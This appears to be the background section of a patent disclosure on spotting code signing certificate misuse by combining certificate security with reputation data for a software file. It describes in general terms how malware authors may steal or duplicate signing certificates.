Public key encryption has proven to be a versatile tool for verifying the authenticity and accuracy of digital data. One application of public key encryption is code signing, which enables a software user to verify (1) that a software file originated from the software publisher that is identified in a code signing certificate embedded in the software file, and (2) that the file has not been modified since it was digitally signed by the software publisher. The security of code signing depends a trusted certificate authority verifying the identity of the software publisher, the software publisher protecting the secrecy of a private key used in the encryption algorithm used to create digital signatures, and the security of code signing certificates used to create signed software files.
Unfortunately, malware developers may target software publishers to steal code signing certificates. These malware developers may then use the stolen certificates to create malware purporting to have originated from the targeted software publishers. Alternatively, malware developers may use duplicated code signing certificates to digitally sign malware. In some cases, malware developers may obtain code signing certificates in the name of a software publisher. These vulnerabilities demonstrate a potential point of weakness of code signing—that the user may not have a way to verify that the software publisher authorized a particular software file to be signed using the accompanying code signing certificate.
In view of the above, the instant disclosure generally relates to systems and methods for identifying code signing certificate misuse by combining code signing certificate security for a software file with reputation data for the software file.